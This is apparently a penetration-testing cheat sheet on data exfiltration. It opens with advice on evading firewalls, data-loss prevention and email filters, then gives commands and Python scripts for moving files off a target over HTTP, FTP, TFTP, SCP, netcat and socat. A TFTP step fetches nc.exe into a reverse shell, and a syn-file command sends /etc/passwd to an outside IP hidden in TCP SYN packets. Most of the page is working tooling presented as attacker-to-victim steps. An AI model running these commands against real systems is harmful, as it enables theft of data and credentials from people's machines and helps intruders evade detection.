Data Exfiltration

The first step to exfiltration is to avoid being caught. This means avoiding firewalls, data loss prevention, email filters, and more. Encoding/encrypting your payload is a good way to do this.

Preparing files for transport

Base64 encode a file

base64 -w0 $file

Base64 decode a file

base64 -d $file

HTTP/HTTPS

One of the easier ways to transfer a file as most devices have web access. Start by finding a directory on the target that you can write to.

# find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
# wget http://<url> -O url.txt -o /dev/null

Curl has the benefit of being able to transfer with IMAP, POP3, SCP, SFTP, SMB, SMTP, TELNET, TFTP< and other protocols. Experimentation may be needed to figure out what is blocked/allowed by the firewall.

# curl -o file.txt http://url.com

Scripted HTTP Servers

python2 -m SimpleHTTPServer $port
python3 -m http.server $port
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888

SimpleHTTPServerWithUpload

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()

FTP

Python FTP server

#!/usr/bin/env python3
# Author : Paranoid Ninja
# Modified: Zweilos
# Description  : Creates a Simple FTP Server in the specified directory

from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import argparse

def main():
    parser = argparse.ArgumentParser(description="Simple FTP Server for file sharing.")
    parser.add_argument("--port", type=int, default=2121, help="Port to run the FTP server on (default: 2121)")
    parser.add_argument("--user", type=str, default="ninja", help="Username for FTP login (default: ninja)")
    parser.add_argument("--password", type=str, default="ninja", help="Password for FTP login (default: ninja)")
    parser.add_argument("--directory", type=str, default=".", help="Directory to serve files from (default: current directory)")
    args = parser.parse_args()

    authorizer = DummyAuthorizer()
    authorizer.add_user(args.user, args.password, args.directory, perm='elradfmw')

    handler = FTPHandler
    handler.authorizer = authorizer
    handler.banner = "Ninja FTP Server"

    address = ('', args.port)
    server = FTPServer(address, handler)

    server.max_cons = 256
    server.max_cons_per_ip = 5

    print(f"Starting FTP server on port {args.port}, serving files from {args.directory}")
    server.serve_forever()

if __name__ == '__main__':
    main()

You can also use the pyftplib module to quickly and easily set up ftp

#pip3 install pyftpdlib
#python3 -m pyftpdlib -p 21

TFTP

Install the TFTP client

sudo apt update && sudo apt install atftp

Download with TFTP

# In Kali 
atftpd --daemon --port 69 /tftp

# In reverse shell
tftp -i 10.10.10.10 GET nc.exe

Upload with TFTP

sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
tftp -i 10.11.0.4 put exfil.zip

SCP

SCP tranfsers files through SSH See SCP section for more.

Get file
# scp user@<remoteip>:/tmp/file /tmp/file

Put file
# scp /tmp/file user@<remoteIP>:/tmp/file

NetCat from target

#start listener to recieve file
nc -nvlp 55555 > file
#send file to listening system
nc $target_ip 55555 < file

Python HTTP server script

#!/usr/bin/env python3

import argparse
from http.server import HTTPServer, SimpleHTTPRequestHandler
import os
import signal
import sys

def list_files(directory, port):
    GN = '\033[92m'  # Green
    CYAN = '\033[96m'  # Cyan
    RES = '\033[0m'  # Reset

    print(f"{GN}Files available for download:{RES}")
    for file in os.listdir(directory):
        if os.path.isfile(os.path.join(directory, file)):
            print(f"{CYAN}wget http://localhost:{port}/{file} -O {file}{RES}")

def handle_interrupt(signal, frame):
    print("\nServer has been shut down gracefully.")
    sys.exit(0)

def main():
    parser = argparse.ArgumentParser(description="Simple HTTP Server for file sharing.")
    parser.add_argument("-p", "--port", type=int, default=8099, help="Port to run the HTTP server on (default: 8099)")
    parser.add_argument("-d", "--directory", type=str, default=os.getcwd(), help="Directory to serve files from (default: current working directory)")
    parser.add_argument("-l", "--links", action="store_true", help="Show wget links for files being served")
    args = parser.parse_args()

    signal.signal(signal.SIGINT, handle_interrupt)

    print(f"\nStarting HTTP server on port {args.port}, serving files from {args.directory}\n")
    os.chdir(args.directory)
    server_address = ('', args.port)
    httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)

    if args.links:
        list_files(args.directory, args.port)

    httpd.serve_forever()

if __name__ == "__main__":
    main()

Other Programs

Socat

#to attacker
sudo socat TCP4-LISTEN:$port:fork file:$file_name
#from victim
socat TCP4:$IP:$port file:$filename,create

sudo is necessary if the port is under 1024. fork allows for multiple connections.

Data exfiltration using TCP SYN

We can use TCP SYN sequence number packets to exfiltrate data using the syn-file tool.

./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5ch

Resources

If you like this content and would like to see more, please consider buying me a coffee!

Last updated

Was this helpful?